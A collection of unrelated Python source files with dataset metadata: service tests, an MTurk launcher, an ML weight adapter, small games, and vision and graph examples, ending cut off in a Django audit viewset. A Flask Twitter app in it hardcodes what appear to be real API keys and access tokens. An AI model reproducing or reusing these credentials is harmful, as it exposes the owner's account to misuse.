'cazimir')\n\n assert group.id\n assert group.pubid\n\n def test_create_private_group_publishes_join_event(self, service, publish):\n group = service.create_private_group('Dishwasher disassemblers', 'theresa')\n\n publish.assert_called_once_with('group-join', group.pubid, 'acct:theresa@example.com')\n\n def 
test_create_open_group_returns_group(self, service, users):\n creator = users['cazimir']\n\n group = service.create_open_group(name='test_group',\n userid=creator.username,\n origins=['https://biopub.org'],\n description='test_description')\n\n assert group.name == 'test_group'\n assert group.authority == 'example.com'\n assert group.creator == creator\n assert group.description == 'test_description'\n assert group.joinable_by is None\n assert group.readable_by == ReadableBy.world\n assert group.writeable_by == WriteableBy.authority\n\n def test_create_open_group_sets_scopes(self, service, matchers, users):\n origins = ['https://biopub.org', 'http://example.com', 'https://wikipedia.com']\n\n group = service.create_open_group(name='test_group',\n userid=users['cazimir'].username,\n origins=origins,\n description='test_description')\n\n assert group.scopes == matchers.unordered_list([\n GroupScopeWithOrigin(h) for h in origins])\n\n def test_create_open_group_always_creates_new_scopes(self, db_session, factories, service, users, matchers):\n # It always creates a new scope, even if a scope with the given origin\n # already exists (this is because a single scope can only belong to\n # one group, so the existing scope can't be reused with the new group).\n origins = ['https://biopub.org', 'http://example.com']\n scopes = [factories.GroupScope(origin=h) for h in origins]\n\n group = service.create_open_group(name='test_group',\n userid=users['cazimir'].username,\n origins=origins,\n description='test_description')\n\n # It should reuse the GroupScopes already in the DB, not try to create\n # new ones.\n for scope in scopes:\n assert scope not in group.scopes\n\n def test_create_open_group_description_defaults_to_None(self, service):\n # Create a group with no `description` argument.\n group = service.create_open_group(name='test_group',\n userid='cazimir',\n origins=['https://biopub.org'])\n\n assert group.description is None\n\n def test_member_join_adds_user_to_group(self, service, group, users):\n service.member_join(group, 'theresa')\n\n assert users['theresa'] in group.members\n\n def test_member_join_is_idempotent(self, service, group, users):\n service.member_join(group, 'theresa')\n service.member_join(group, 'theresa')\n\n assert group.members.count(users['theresa']) == 1\n\n def test_member_join_publishes_join_event(self, service, publish, group):\n group.pubid = 'abc123'\n\n service.member_join(group, 'theresa')\n\n publish.assert_called_once_with('group-join', 'abc123', 'theresa')\n\n def test_member_leave_removes_user_from_group(self, service, users):\n group = Group(name='Theresa and her buddies',\n authority='foobar.com',\n creator=users['theresa'])\n group.members.append(users['cazimir'])\n\n service.member_leave(group, 'cazimir')\n\n assert users['cazimir'] not in group.members\n\n def test_member_leave_is_idempotent(self, service, users):\n group = Group(name='Theresa and her buddies',\n authority='foobar.com',\n creator=users['theresa'])\n group.members.append(users['cazimir'])\n\n service.member_leave(group, 'cazimir')\n service.member_leave(group, 'cazimir')\n\n assert users['cazimir'] not in group.members\n\n def test_member_leave_publishes_leave_event(self, service, users, publish):\n group = Group(name='Donkey Trust',\n authority='foobari.com',\n creator=users['theresa'])\n group.members.append(users['cazimir'])\n group.pubid = 'abc123'\n\n service.member_leave(group, 'cazimir')\n\n publish.assert_called_once_with('group-leave', 'abc123', 'cazimir')\n\n 
@pytest.mark.parametrize('with_user', [True, False])\n def test_groupids_readable_by_includes_world(self, with_user, service, db_session, factories):\n user = None\n if with_user:\n user = factories.User()\n db_session.flush()\n\n assert '__world__' in service.groupids_readable_by(user)\n\n @pytest.mark.parametrize('with_user', [True, False])\n def test_groupids_readable_by_includes_world_readable_groups(self, with_user, service, db_session, factories):\n # group readable by members\n factories.Group(readable_by=ReadableBy.members)\n # group readable by everyone\n group = factories.Group(readable_by=ReadableBy.world)\n\n user = None\n if with_user:\n user = factories.User()\n db_session.flush()\n\n assert group.pubid in service.groupids_readable_by(user)\n\n def test_groupids_readable_by_includes_memberships(self, service, db_session, factories):\n user = factories.User()\n\n group = factories.Group(readable_by=ReadableBy.members)\n group.members.append(user)\n\n db_session.flush()\n\n assert group.pubid in service.groupids_readable_by(user)\n\n def test_groupids_created_by_includes_created_groups(self, service, factories):\n user = factories.User()\n group = factories.Group(creator=user)\n\n assert group.pubid in service.groupids_created_by(user)\n\n def test_groupids_created_by_excludes_other_groups(self, service, db_session, factories):\n user = factories.User()\n private_group = factories.Group()\n private_group.members.append(user)\n factories.Group(readable_by=ReadableBy.world)\n db_session.flush()\n\n assert service.groupids_created_by(user) == []\n\n def test_groupids_created_by_returns_empty_list_for_missing_user(self, service):\n assert service.groupids_created_by(None) == []\n\n @pytest.fixture\n def group(self, users):\n return Group(name='Donkey Trust',\n authority='foobar.com',\n creator=users['cazimir'])\n\n @pytest.fixture\n def publish(self):\n return mock.Mock(spec_set=[])\n\n @pytest.fixture\n def service(self, db_session, users, publish):\n return GroupService(db_session, users.get, publish=publish)\n\n\n@pytest.mark.usefixtures('user_service')\nclass TestGroupsFactory(object):\n def test_returns_groups_service(self, pyramid_request):\n svc = groups_factory(None, pyramid_request)\n\n assert isinstance(svc, GroupService)\n\n def test_provides_request_db_as_session(self, pyramid_request):\n svc = groups_factory(None, pyramid_request)\n\n assert svc.session == pyramid_request.db\n\n def test_wraps_user_service_as_user_fetcher(self, pyramid_request, user_service):\n svc = groups_factory(None, pyramid_request)\n\n svc.user_fetcher('foo')\n\n user_service.fetch.assert_called_once_with('foo')\n\n def test_provides_realtime_publisher_as_publish(self, patch, pyramid_request):\n pyramid_request.realtime = mock.Mock(spec_set=['publish_user'])\n session = patch('h.services.group.session')\n svc = groups_factory(None, pyramid_request)\n\n svc.publish('group-join', 'abc123', 'theresa')\n\n session.model.assert_called_once_with(pyramid_request)\n pyramid_request.realtime.publish_user.assert_called_once_with({\n 'type': 'group-join',\n 'session_model': session.model.return_value,\n 'userid': 'theresa',\n 'group': 'abc123',\n })\n\n\nclass GroupScopeWithOrigin(Matcher):\n \"\"\"Matches any GroupScope with the given origin.\"\"\"\n\n def __init__(self, origin):\n self.origin = origin\n\n def __eq__(self, group_scope):\n if not isinstance(group_scope, GroupScope):\n return False\n return group_scope.origin == self.origin\n\n\n@pytest.fixture\ndef user_service(pyramid_config):\n service = 
mock.Mock(spec_set=['fetch'])\n service.fetch.return_value = None\n pyramid_config.register_service(service, name='user')\n return service\n\n\n@pytest.fixture\ndef users(factories):\n return {\n 'cazimir': factories.User(username='cazimir'),\n 'theresa': factories.User(username='theresa'),\n }\n","sub_path":"tests/h/services/group_test.py","file_name":"group_test.py","file_ext":"py","file_size_in_byte":11488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"565452842","text":"import boto3\nimport os\nimport random\nfrom launch_init import *\n\n\n\n# Opening connection to the Mturk server\nkeys = []\nwith open(file=key_location, mode='r') as key_file:\n\tkeys = key_file.read().splitlines()\n\n\nmturk = boto3.client('mturk',\n aws_access_key_id = keys[0],\n aws_secret_access_key = keys[1],\n region_name='us-east-1',\n endpoint_url = MTURK_SANDBOX\n)\n\n# Taking the basic xml template and inserting the vega (or vega lite) code\nspecs = []\nwith open(file=xml_location, mode='r') as xml_wrapper:\n\tsplit_xml_wrapper = xml_wrapper.read().split('LOCATION_FOR_VEGA_CODE')\n\tfor vega_file in os.listdir(vega_directory):\n\t\twith open (file=vega_directory + vega_file, mode='r') as vega:\n\t\t\tcontents = vega.read()\n\t\t\tspecs.append(split_xml_wrapper[0] + contents + split_xml_wrapper[1])\n\n# Loop through the different HIT's and launch each one\nwith open(file=hit_id_location, mode='w+') as hit_id_file:\n\tfor i in range(len(specs)):\n\t\tnew_hit = mturk.create_hit(\n\t \tTitle = 'Unique testing name (' + str(random.randint(1, 100000000)) + str(i) + ')',\n\t \tDescription = 'Answer our questions about visualization!',\n\t \tKeywords = 'text, quick, labeling',\n\t \tReward = '0.15',\n\t \tMaxAssignments = 100,\n\t \tLifetimeInSeconds = 172800,\n\t \tAssignmentDurationInSeconds = 600,\n\t \tAutoApprovalDelayInSeconds = 14400,\n\t \tQuestion = specs[i],\n\t\t)\t\n\n\t\t# These prints are not necessary, but are nice for testing in sandbox\n\t\tprint(\"A new HIT has been created. 
You can preview it here (\" + str(i) + \"):\")\n\t\tprint(\"https://workersandbox.mturk.com/mturk/preview?groupId=\" + new_hit['HIT']['HITGroupId'])\n\t\tprint(\"HITID = \" + new_hit['HIT']['HITId'] + \" (Use to Get Results)\")\t\n\n\t\t# Write the HIT id to a file so we can get the data back\n\t\thit_id_file.write(new_hit['HIT']['HITId'] + \"\\n\")\n\t\t","sub_path":"launch_hit.py","file_name":"launch_hit.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"639844463","text":"#!/usr/bin/env python\n#\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#\n# Alex Dementsov\n# California Institute of Technology\n# (C) 2009 All Rights Reserved\n#\n# {LicenseText}\n#\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#\n\n# Configuration parameters from INPUT_GIPAW.html file\n# First value is default value\n\n# Namelist: INPUTGIPAW\n\nnamelists = ('inputgipaw',)\ncards = ()\n\nnamelist_inputgipaw = ('job',\n 'prefix',\n 'tmp_dir',\n 'conv_threshold',\n 'isolve',\n 'q_gipaw',\n 'iverbosity',\n 'filcurr',\n 'filfield',\n 'read_recon_in_paratec_fmt',\n 'file_reconstruction',\n 'use_nmr_macroscopic_shape',\n 'nmr_macroscopic_shape(3,3)',\n 'spline_ps')\n\n\n__date__ = \"$Sep 2, 2009 11:51:30 AM$\"\n\n\n","sub_path":"espresso/tags/qecalc-0.2.1/build/lib/qecalc/qetask/qeparser/inputs/inputgipaw.py","file_name":"inputgipaw.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"318495424","text":"import json\nimport logging\nimport os\n\nimport tensorflow as tf\n\nfrom .abstract_adapter import AbstractAdapter, zip_weights\n\n\nclass BertAdapter(AbstractAdapter):\n\n def adapte_config(self, config_file, **kwrgs):\n with open(config_file, mode='rt', encoding='utf8') as fin:\n config = json.load(fin)\n\n model_config = {\n 'vocab_size': config['vocab_size'],\n 'activation': config['hidden_act'],\n 'max_positions': config['max_position_embeddings'],\n 'hidden_size': config['hidden_size'],\n 'type_vocab_size': config['type_vocab_size'],\n 'intermediate_size': config['intermediate_size'],\n 'hidden_dropout_rate': config['hidden_dropout_prob'],\n 'attention_dropout_rate': config['attention_probs_dropout_prob'],\n 'stddev': config['initializer_range'],\n 'num_layers': config['num_hidden_layers'],\n 'num_attention_heads': config['num_attention_heads'],\n }\n return model_config\n\n def adapte_weights(self, model, config, ckpt, **kwargs):\n # mapping weight names\n weights_mapping = self._mapping_weight_names(config['num_layers'])\n # zip weight names and values\n zipped_weights = zip_weights(\n model,\n ckpt,\n weights_mapping,\n verbose=kwargs.get('verbose', True))\n # set values to weights\n tf.keras.backend.batch_set_value(zipped_weights)\n\n def _mapping_weight_names(self, num_layers=12):\n mapping = {}\n\n # embedding\n mapping.update({\n 'bert/embedding/weight:0': 'bert/embeddings/word_embeddings',\n 'bert/embedding/token_type_embedding/embeddings:0': 'bert/embeddings/token_type_embeddings',\n 'bert/embedding/position_embedding/embeddings:0': 'bert/embeddings/position_embeddings',\n 'bert/embedding/layer_norm/gamma:0': 'bert/embeddings/LayerNorm/gamma',\n 'bert/embedding/layer_norm/beta:0': 'bert/embeddings/LayerNorm/beta',\n })\n\n # encoder\n model_prefix = 'bert/encoder/layer_{}'\n for i in range(num_layers):\n encoder_prefix = 
'bert/encoder/layer_{}/'.format(i)\n # attention\n attention_prefix = encoder_prefix + 'attention/'\n for n in ['query', 'key', 'value']:\n for w in ['kernel', 'bias']:\n mapping[attention_prefix + n + '/' + w + ':0'] = attention_prefix + 'self/' + n + '/' + w\n #\n mapping[attention_prefix + 'dense/kernel:0'] = attention_prefix + 'output/dense/kernel'\n mapping[attention_prefix + 'dense/bias:0'] = attention_prefix + 'output/dense/bias'\n mapping[attention_prefix + 'layer_norm/gamma:0'] = attention_prefix + 'output/LayerNorm/gamma'\n mapping[attention_prefix + 'layer_norm/beta:0'] = attention_prefix + 'output/LayerNorm/beta'\n # intermediate\n intermediate_prefix = encoder_prefix + 'intermediate/'\n mapping[intermediate_prefix + 'dense/kernel:0'] = intermediate_prefix + 'dense/kernel'\n mapping[intermediate_prefix + 'dense/bias:0'] = intermediate_prefix + 'dense/bias'\n # output\n mapping[encoder_prefix + 'dense/kernel:0'] = encoder_prefix + 'output/dense/kernel'\n mapping[encoder_prefix + 'dense/bias:0'] = encoder_prefix + 'output/dense/bias'\n mapping[encoder_prefix + 'layer_norm/gamma:0'] = encoder_prefix + 'output/LayerNorm/gamma'\n mapping[encoder_prefix + 'layer_norm/beta:0'] = encoder_prefix + 'output/LayerNorm/beta'\n\n # pooler\n mapping['bert/pooler/dense/kernel:0'] = 'bert/pooler/dense/kernel'\n mapping['bert/pooler/dense/bias:0'] = 'bert/pooler/dense/bias'\n\n return mapping\n","sub_path":"transformers_keras/adapters/bert_adapter.py","file_name":"bert_adapter.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"609083410","text":"from coinbase.wallet.client import Client\nfrom coinbase.wallet.error import APIError\n\n\nclass CoinBase:\n\n def __init__(self, config):\n self.auth_client = Client(config['API_KEY'], config['SECRET'])\n\n def amount(self):\n try:\n account = self.auth_client.get_account(\n \"0ed05157-8cee-501a-bd7e-4fe2aa8d62b8\")\n return float(account['native_balance']['amount'])\n except APIError as err:\n raise err\n except KeyError as err:\n raise err\n except ValueError as err:\n raise err\n","sub_path":"coinbase_api.py","file_name":"coinbase_api.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"574589060","text":"# -*- coding: utf-8 -*-\n\"\"\"\n* @Author: ziuno\n* @Software: PyCharm\n* @Time: 2019/4/12 18:14\n\"\"\"\nfrom itertools import chain\n\n\nclass UAVMesh(object):\n def __init__(self, mesh):\n self.__mesh = mesh\n self.__vertexes = mesh.vertexes\n self.__edges = mesh.edges\n self.__faces = mesh.faces\n\n def __oxen_led(self):\n path = []\n half_edges = self.__vertex.half_edges.copy()\n while len(half_edges) != 0:\n half_edge = half_edges[0]\n face = half_edge.face\n if self.__faces.count(face) == 0:\n del half_edges[0]\n continue\n source_vertex = half_edge.source_vertex\n target_vertex = half_edge.target_vertex\n path.append(['oxen-led', self.__vertexes.index(source_vertex), self.__vertexes.index(target_vertex),\n self.__faces.index(face)])\n self.__faces.remove(face)\n self.__vertex = target_vertex\n half_edges = self.__vertex.half_edges.copy()\n return path\n\n def __jump_out(self):\n path = []\n source_vertex_index = self.__vertexes.index(self.__vertex)\n half_edges = [face.half_edges for face in self.__faces]\n half_edges = list(chain(*half_edges))\n target_vertex_indexes = [self.__vertexes.index(half_edge.target_vertex) for half_edge in half_edges]\n 
target_vertex_indexes = list(set(target_vertex_indexes))\n\n def get_map_dist(mesh):\n map = {}\n for vertex in mesh.vertexes:\n source_index = self.__vertexes.index(vertex)\n map[source_index] = {}\n half_edges = vertex.half_edges\n target_vertexes = [half_edge.target_vertex for half_edge in half_edges]\n target_indexes = [self.__vertexes.index(target_vertex) for target_vertex in target_vertexes]\n for targer_index in target_indexes:\n map[source_index][targer_index] = 1\n return map\n\n graph = get_map_dist(self.__mesh)\n\n def get_cost_dist(map, source):\n cost = {}\n can_go_s = map[source]\n for can_go in can_go_s:\n cost[can_go] = map[source][can_go]\n can_not_go_s = map.keys() - can_go_s\n for can_not_go in can_not_go_s:\n cost[can_not_go] = 999\n cost[source] = 0\n return cost\n\n cost = get_cost_dist(graph, source_vertex_index)\n visited = [source_vertex_index]\n parents = {}\n\n def findShorestNode(cost):\n minDist = 999\n node = None\n for i in graph.keys():\n if (cost[i] < minDist) & (i not in visited):\n minDist = cost[i]\n node = i\n return node\n\n node = findShorestNode(cost)\n while node:\n for i in graph[node]:\n newcost = cost[node] + graph[node][i]\n if newcost < cost[i]:\n parents[i] = node\n cost[i] = newcost\n visited.append(node)\n node = findShorestNode(cost)\n can_go_costs = []\n can_go_keys = graph[source_vertex_index].keys()\n for target_vertex_index in target_vertex_indexes:\n can_go_costs.append([cost[target_vertex_index], target_vertex_index])\n can_go_costs.sort()\n _, target_vertex_index = can_go_costs[0]\n tmp_path = [target_vertex_index]\n tmp_index = tmp_path[-1]\n while tmp_index not in can_go_keys:\n tmp_path.append(parents[tmp_index])\n tmp_index = tmp_path[-1]\n while len(tmp_path) != 0:\n target_vertex_index = tmp_path[-1]\n half_edges = self.__vertex.half_edges\n for half_edge in half_edges:\n index = self.__vertexes.index(half_edge.target_vertex)\n if index != target_vertex_index:\n continue\n path.append(['move', source_vertex_index, index])\n del tmp_path[-1]\n self.__vertex = half_edge.target_vertex\n source_vertex_index = index\n break\n return path\n\n def get_uav_path_from_vertex(self, vertex):\n path = []\n if self.__vertexes.count(vertex) == 0:\n raise ValueError('[error] the start vertex is not in the vertexes')\n vertex = self.__vertexes[self.__vertexes.index(vertex)]\n self.__vertex = vertex\n while len(self.__faces) != 0:\n path.append(self.__oxen_led())\n if len(self.__faces) == 0:\n break\n path.append(self.__jump_out())\n self.__faces = self.__mesh.faces.copy()\n return path\n","sub_path":"utils/UAVMesh.py","file_name":"UAVMesh.py","file_ext":"py","file_size_in_byte":4761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"411946876","text":"import time\nlista=[ '''\n\n========= 1''','''\n\n| \n| \n| \n|\n|\n========= 2''','''\n+---+\n| \n| \n|\n|\n|\n========= 3''','''\n+---+\n| |\n| \n| \n| \n| \n========= 4''','''\n+---+\n| |\n| O\n| \n| \n| \n========= 5''','''\n+---+\n| |\n| O\n| |\n|\n|\n=========6''','''\n+---+\n| |\n| O\n| /|\n| \n| \n=========7''','''\n+---+\n| |\n| O\n| /|\\\n| \n| \n========= 8''','''\n+---+\n| |\n| O\n| /|\\\n| / \n| \n========= 9''','''\n+---+\n| |\n| O\n| /|\\\n| / \\\n| \n========= 10''']\nnombre=input(\"como te llamas \")\nprint(\"hola, \"+nombre,\" es hora de jugar\")\nprint(\" \")\ntime.sleep(1)\nprint(\"comienza a adivinar\")\ntime.sleep(0.5)\npalabra=\"murcielago\"\ntupalabra=\" \"\nvidas=10\n\nwhile vidas > 0:\n fallas=0\n for letra in 
palabra:\n if letra in tupalabra:\n print(letra,end=\"\")\n else:\n print(\"*\",end=\"\")\n fallas+=1\n \n if fallas==0:\n input()\n print(\"\")\n print(\"felicidades, ganaste\")\n input()\n break\n\n tuletra=input(\"introduce una letra: \")\n tupalabra+=tuletra\n\n\n \n if tuletra not in palabra:\n vidas-=1\n if vidas==9:\n print (lista[0])\n if vidas==8:\n print(lista[1])\n if vidas==7:\n print(lista[2])\n if vidas==2:\n print(lista[3])\n if vidas==6:\n print(lista[4])\n if vidas==5:\n print(lista[5])\n if vidas==4:\n print(lista[6])\n if vidas==3:\n print(lista[7])\n if vidas==2:\n print(lista[8])\n if vidas==1:\n print(lista[9])\n if vidas== 0:\n print(lista[-1])\n print(\"perdiste!\")\n ganado=1\nelse:\n input()\n print(\"gracias por participar\")\n input()\n \n","sub_path":"your-project/prueba.py","file_name":"prueba.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"141618622","text":"\"\"\"\nThis function detects the circular features on a car model\n\nModificatoin: Since the function SimpleBlobDetector_create() takes a long\ntime to run, multiprocessing is applied to increase the speed.\n\nAuthor: Xu Yang\nABB\n\nModified by: Siqi Dai\n\"\"\"\n\n\nimport cv2\nfrom multiprocessing.pool import ThreadPool\n\n\ndef feature_detection(image, min_area, max_area):\n Param_bright = cv2.SimpleBlobDetector_Params()\n Param_dark = cv2.SimpleBlobDetector_Params()\n\n # parameter settings\n Param_bright.filterByColor = Param_dark.filterByColor = True\n Param_bright.blobColor = 255\n Param_dark.blobColor = 0\n\n Param_bright.minThreshold = Param_dark.minThreshold = 50\n Param_bright.maxThreshold = Param_dark.maxThreshold = 255\n Param_bright.thresholdStep = Param_dark.thresholdStep = 2\n\n Param_bright.filterByArea = Param_dark.filterByArea = True\n Param_bright.minArea = Param_dark.minArea = min_area # low image quality: 90, high image quality: 600\n Param_bright.maxArea = Param_dark.maxArea = max_area # low image quality: 1000, high image quality: 6000\n\n Param_bright.filterByCircularity = Param_dark.filterByCircularity = True\n Param_bright.minCircularity = Param_dark.minCircularity = 0.7\n\n # construct detectors for dark blob and bright blob\n # use multiprocessing\n pool2 = ThreadPool(processes=2)\n async_res_bright2 = pool2.apply_async(cv2.SimpleBlobDetector_create,(Param_bright,))\n async_res_dark2 = pool2.apply_async(cv2.SimpleBlobDetector_create,(Param_dark,))\n detector_bright = async_res_bright2.get()\n detector_dark = async_res_dark2.get()\n\n # use multiprocessing to speed up\n pool = ThreadPool(processes=4)\n async_res_dark = pool.apply_async(detector_dark.detect,(image,))\n async_res_bright = pool.apply_async(detector_bright.detect,(image,))\n keypoints_dark = async_res_dark.get()\n keypoints_bright = async_res_bright.get()\n keypoints = keypoints_bright + keypoints_dark\n\n return keypoints\n","sub_path":"feature_detection.py","file_name":"feature_detection.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"195594301","text":"from flask import Flask, render_template, request\nfrom flask_tweepy import Tweepy\nfrom pi import MyStreamListener, Steann\nfrom textblob import TextBlob\nimport sqlite3\n\nc_key = \"1Va9E6ca4zb43q9JWf8mfZafc\"\nc_secret = \"9tg89S9VcKf9AzfZh9CeMrsT8TjnbJN43RyTOxUX6uuddduE4W\"\n\na_token = \"114579331-2Yg0Cni9ecvmiXW3xSAMtxb3SUzBCeokTDR4n7qV\"\na_secret = 
\"WTnmBbrkqNFPhVH9EHirwR1Q8og0Ef3QVZabSZuwcZWrz\"\napp = Flask(__name__)\napp.config.setdefault('TWEEPY_CONSUMER_KEY', c_key)\napp.config.setdefault('TWEEPY_CONSUMER_SECRET', c_secret)\napp.config.setdefault('TWEEPY_ACCESS_TOKEN_KEY', a_token)\napp.config.setdefault('TWEEPY_ACCESS_TOKEN_SECRET', a_secret)\n\ntweepy = Tweepy(app)\n\ntopix = []\nwith sqlite3.connect(\"Twitter_data.db\") as connection:\n\tc = connection.cursor()\n\tc.execute(\"CREATE TABLE IF NOT EXISTS TrackData (Username TEXT, Sent TEXT, Message TEXT)\")\n\n\n@app.route(\"/\", methods=['POST', 'GET'])\ndef hello():\n return render_template('index.html')\n\n\n@app.route(\"/result\", methods=[\"POST\", \"GET\"])\ndef show_result():\n\tnames = []\n\tblobase = []\n\tpolars = []\n\tif request.method == \"POST\":\n\t\tresult = request.form['topic']\n\t\ttweetl = tweepy.api.search(q=result, lang='en', show_user=True)\n\t\tfor o in tweetl:\n\t\t\tnames.append(o.user.screen_name)\n\t\t\tblobase.append(o.text)\n\t\t\tpolars.append(TextBlob(o.text).sentiment.polarity)\n\t\tlinkval = zip(names, blobase, polars)\n\t\treturn render_template('result.html', topics=linkval)\n\n\n@app.route('/tweets', methods=['POST', 'GET'])\ndef show_tweets():\n\ttopix = request.form['qtops'].encode('utf-8').split()\n\tif request.method == \"POST\":\n\t\tmms = MyStreamListener()\n\t\tmystream = Steann(auth=tweepy.api.auth, listener=mms)\n\t\tmystream.filter(track=topix)\n\t\tmoom = mystream.disconnect()\n\treturn render_template('tweets.html', user=moom)\n\n\n@app.route('/news')\ndef news():\n\tnewtwt = tweepy.api.home_timeline()\n\treturn render_template('news.html', new=newtwt)\n\n\n@app.route('/id-finder', methods=[\"GET\", \"POST\"])\ndef id_finder():\n\tfound_ID = None\n\terror_message = None\n\tif request.method == \"POST\":\n\t\ttry:\n\t\t\tfound_name = request.form['inputSmall']\n\t\t\tgotten_user = tweepy.api.get_user(found_name)\n\t\t\tfound_ID = gotten_user.id\n\t\texcept Exception as e:\n\t\t\terror_message = e\n\treturn render_template('finder.html', twitID=found_ID, errno=error_message)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"16500222","text":"import argparse\nimport torchvision.transforms as transforms\nfrom PIL import Image\nimport numpy as np\nimport scipy.ndimage as pyimg\nimport random\nimport os\n\nimport utils\n\ndef parse_args():\n\tdesc = \"Convert an image to be used for training\" \n\tparser = argparse.ArgumentParser(description=desc)\n\n\tparser.add_argument('--image', type=str,\n\t\tdefault=None,\n\t\thelp='Directory path to the image. (default: %(default)s)')\n\n\tparser.add_argument('--image_mask', type=str,\n\t\tdefault=None,\n\t\thelp='Directory path to the image mask. (default: %(default)s)')\n\n\tparser.add_argument('--max_height', type=int, \n\t\tdefault=None,\n\t\thelp='Maximum height of the output images. 
(default: %(default)s)')\n\n\n\targs = parser.parse_args()\n\treturn args\n\ndef resize(image, max = None):\n\tw,h = image.size\n\tr = w/h\n\tif max is not None:\n\t\tdim = (int(r*max), max)\n\t\timage = image.resize(dim)\n\n\t# return the resized image\n\treturn image\n\ndef main():\n\tglobal args\n\targs = parse_args()\n\tfilename = os.path.splitext(os.path.basename(args.image))[0]\n\tmask_filename = os.path.splitext(os.path.basename(args.image_mask))[0]\n\n\timg = Image.open(args.image)\n\n\tif args.max_height is not None:\n\t\timg = resize(img,args.max_height)\n\t\tprocessed_mask = resize(utils.text_image_preprocessing(args.image_mask),args.max_height)\n\telse:\n\t\tprocessed_mask = utils.text_image_preprocessing(args.image_mask)\n\n\tprocessed_mask.save(os.path.join('../data/style',mask_filename+'_processed.png'))\n\n\tdst = Image.new('RGB', (img.width + img.width, img.height))\n\tdst.paste(img, (img.width, 0))\n\tdst.paste(processed_mask, (0, 0))\n\tdst.save(os.path.join('../data/style',filename+'.png'))\n\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"src/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"68534698","text":"import dwave_networkx as dnx\nimport networkx as nx\nimport dimod\n\n# Use basic simulated annealer\nsampler = dimod.SimulatedAnnealingSampler()\n\n# Set up a Networkx Graph\nG = nx.Graph()\nG.add_edges_from([(0, 1), (0, 2), (1, 2), (1, 3), (2, 3), (1, 4), (2, 4), (3, 4), (3, 5), (4, 5), (5, 2)])\n\n# Get the max cut\ncandidate = dnx.maximum_cut(G, sampler)\nif len(candidate) == 3:\n print (candidate, \" is the right length\")\nelse:\n print (candidate, \" is not the right length\")\n","sub_path":"dwave_networkx/examples/max_cut.py","file_name":"max_cut.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"457084769","text":"#asking for a guess\nprint(\"Hello Pal, Whats your name?\")\nname = input(\">\")\nprint(\"Well\", name, \"I was thinkling in a game between 1 to 20. Can you guess?\")\nimport random\nsecretNumber = random.randint(1, 20)\n\nfor guessesTaken in range(1, 7):\n try:\n print(\"take a guess:\")\n guess = int(input(\">\"))\n except:\n print(\"please add an integer\")\n continue\n \n if guess < secretNumber:\n print(\"your guess is too low\")\n elif guess > secretNumber:\n print(\"your guess is too high\")\n elif guess != int(secretNumber):\n print(\"Sorry you took too many guesses\")\n else:\n break #this condition is for the good guess.\n \ntry: \n if guess == secretNumber:\n print(\"Good Job!\", name)\n print(\"you guess my number in\", str(guessesTaken), \"guesses\") \n else: \n print(\"Sorry you took too many guesses\")\n print(\"the number I was thinking of was\", str(secretNumber)) \nexcept:\n quit()","sub_path":"guessingNumber.py","file_name":"guessingNumber.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"69807934","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTencentBlueKing is pleased to support the open source community by making 蓝鲸智云-用户管理(Bk-User) available.\nCopyright (C) 2017-2021 THL A29 Limited, a Tencent company. 
All rights reserved.\nLicensed under the MIT License (the \"License\"); you may not use this file except in compliance with the License.\nYou may obtain a copy of the License at http://opensource.org/licenses/MIT\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on\nan \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the\nspecific language governing permissions and limitations under the License.\n\"\"\"\nimport logging\nimport math\n\nimport bkuser_sdk\nfrom bkuser_shell.audit import serializers\nfrom bkuser_shell.audit.constants import OPERATION_OBJ_VALUE_MAP, OPERATION_VALUE_MAP\nfrom bkuser_shell.bkiam.constants import ActionEnum\nfrom bkuser_shell.common.error_codes import error_codes\nfrom bkuser_shell.common.export import ProfileExcelExporter\nfrom bkuser_shell.common.viewset import BkUserApiViewSet\nfrom django.conf import settings\nfrom django.utils.timezone import make_aware\nfrom openpyxl import load_workbook\n\nfrom bkuser_global.drf_crown import ResponseParams, inject_serializer\nfrom bkuser_global.utils import get_timezone_offset\n\nlogger = logging.getLogger(__name__)\n\n\nclass AuditLogViewSet(BkUserApiViewSet):\n ACTION_ID = ActionEnum.VIEW_AUDIT.value\n\n def _get_categories_map(self, request) -> dict:\n \"\"\"Get categories id map\"\"\"\n api_instance = bkuser_sdk.CategoriesApi(self.get_api_client_by_request(request, no_auth=True))\n categories = self.get_paging_results(api_instance.v2_categories_list)\n\n return {x[\"id\"]: x for x in 